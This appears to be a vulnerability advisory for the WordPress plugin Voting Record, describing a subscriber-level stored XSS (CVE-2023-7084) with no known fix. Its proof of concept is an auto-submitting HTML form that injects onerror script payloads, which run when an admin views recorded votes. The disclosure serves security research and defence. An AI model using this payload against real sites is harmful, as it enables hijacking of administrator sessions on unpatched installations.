WordPress Plugin Vulnerabilities

Voting Record <= 2.0 - Subscriber+ Stored XSS

Description

The plugin is missing sanitisation as well as escaping, which could allow any authenticated users, such as subscriber to perform Stored XSS attacks

Proof of Concept

Have a subscriber open an HTML file containing the following:

```
<form action="http://localhost:8888/wordpress/wp-admin/index.php" method="POST">
    <input type="text" name="bill" value="1">
    <input type="text" name="description" value='subscriber"><img src=x onerror=alert(19)>'>
    <input type="text" name="vote" value="Yea">
    <input type="text" name="voter" value='subscriber"><img src=x onerror=alert(20)>'>
    <input type="text" name="date" value="2022-12-10">
    <input type="text" name="result" value="pass">
    <input type="text" name="tally" value="3">
    <input type="text" name="record_vote" value="Save">
</form>
<script>
    document.forms[0].submit();
</script>
```

See the XSS when logged in as an admin and viewing recorded votes.

Affects Plugins

Plugin icon
voting-record
No known fix

References

CVE
CVE-2023-7084
URL
https://magos-securitas.com/txt/CVE-2023-7084.txt

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://magos-securitas.com
Verified
Yes
WPVDB ID
5e51e239-919b-4e74-a7ee-195f3817f907

Timeline

Publicly Published
2024-01-10 (about 4 months ago)
Added
2024-01-10 (about 4 months ago)
Last Updated
2024-01-10 (about 4 months ago)

Other

Published
Title
Published
2021-08-25
Title
MX Time Zone Clocks < 3.4.1 - Contributor+ Cross-Site Scripting
Published
2018-11-14
Title
Ninja Forms <= 3.3.17 - Unauthenticated Cross-Site Scripting (XSS)
Published
2015-06-14
Title
Content Grabber 1.0 - Cross-Site Scripting (XSS)
Published
2022-06-21
Title
Brizy Page Builder < 2.4.2 - Contributor+ Stored Cross-Site Scripting via Element URL
Published
2024-03-16
Title
Download Manager < 3.2.85 - Contributor+ Stored XSS